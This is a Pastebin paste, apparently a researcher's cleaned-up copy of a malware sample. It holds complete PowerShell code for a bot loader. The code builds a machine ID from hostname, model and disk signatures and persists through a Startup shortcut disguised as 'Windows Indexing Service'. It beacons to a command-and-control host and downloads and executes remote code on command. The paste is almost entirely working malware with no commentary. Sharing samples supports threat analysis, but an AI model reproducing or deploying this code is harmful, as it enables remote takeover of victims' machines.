Advertisement
James_inthe_box

Cleaned

Mar 28th, 2019
397
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.27 KB | None | 0 0
  1. Function CreateShortcut( $lnk, $Arguments, $WorkingDirectory ){ try{ $Shell = New-Object -ComObject ('WScript.Shell'); $ShortCut = $Shell.CreateShortcut( $lnk ); $ShortCut.Arguments= $Arguments; $ShortCut.TargetPath = 'cscript.exe'; $ShortCut.WorkingDirectory = $WorkingDirectory; $ShortCut.WindowStyle = 1; $ShortCut.Description = 'Windows Indexing Service'; $ShortCut.Save(); Return 'CreateShortcut -> ok'; }catch{ Return 'CreateShortcut -> fail'; } } Function CreateID { $a = ''; try{ $a = (Get-WmiObject -class Win32_ComputerSystem -Property Name).Name.trim() + '_'; }catch{ $a = 'OMG_'; } try{ $a += (Get-WmiObject -class Win32_ComputerSystem -Property Model).Model.trim() + '_'; }catch{ $a += 'OMG_'; } try{ foreach ($disk in (gwmi win32_diskdrive)) { $a += [convert]::tostring($disk.signature, 16); } }catch{ $a += '0000000'; } Return $a; } $ver = "327.2"; $url_adm = 'http://green.datota.it/'; $bot_id = CreateID; try{ $bot_os = [string]$PSVersionTable.BuildVersion; }catch{ $bot_os = "undefined"; } $timeout = 120; $logs = @([string]( $(get-date) )); $psver = ( (Get-Host).Version ).Major; $my_dir = [System.IO.Path]::GetTempPath(); $ldr = 'SearchI32'; $stop_id = Join-Path $my_dir '1'; $exe_file = Join-Path $my_dir 'SearchI32.exe'; $ldr_file = Join-Path $my_dir 'SearchI32.txt'; $JS_file = Join-Path $my_dir 'SearchI32.js'; $runfile = Join-Path $my_dir 'SearchI32.tmp'; $lnk = [Environment]::GetFolderPath('Startup') + '\Windows Indexing Service '+$ldr+'.lnk'; if( test-path -path $runfile ){ if ( ($(Get-Date) - $(Get-Item -path $runfile).LastWriteTime).TotalSeconds -lt ($timeout * 3) ){ Start-Sleep -Seconds (3 * $timeout + 10 ); Start-Process $JS_file; exit; } } if( ![System.IO.File]::Exists( $lnk ) ){ $logs += CreateShortcut $lnk $JS_file $my_dir; }else{ $logs += $lnk; } $req = New-Object System.Net.WebClient; $req.Credentials = [System.Net.CredentialCache]::DefaultCredentials; $req.QueryString.Add('b', $bot_id ); $req.QueryString.Add('os', $bot_os ); $req.QueryString.Add('v', $ver ); $req.QueryString.Add('psver', $psver ); if( test-path -path $stop_id ){ rename-item -path $stop_id 'test'; } $count = 0; while ($count -le 1) { Get-Date | out-file $runfile; if ( test-path -path $stop_id ){ $count = 2; exit; }else{ try{ $action = $req.DownloadString( $url_adm ).Split('|'); }catch{ $action = 'w|'.Split('|'); } switch ( $action[0] ) { 'm1' { try{ iex -Command $req.DownloadString( $action[1] ); }catch{} break; } 'm' { try{ $req.DownloadString( $action[1] ).Split('|') | foreach { iex -Command $req.DownloadString( $_); }; }catch{} break; } 'u' { try{ try{ Remove-Item -Path $runfile; }catch{} $req.DownloadFile($action[1], $ldr_file ); $req.DownloadFile($action[2], $JS_file ); $count = 2; Start-Sleep -Seconds $timeout; Start-Process $JS_file; exit; }catch{ Start-Sleep -Seconds $timeout; } break; } default{ Start-Sleep -Seconds $timeout; break; } } } }vh
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement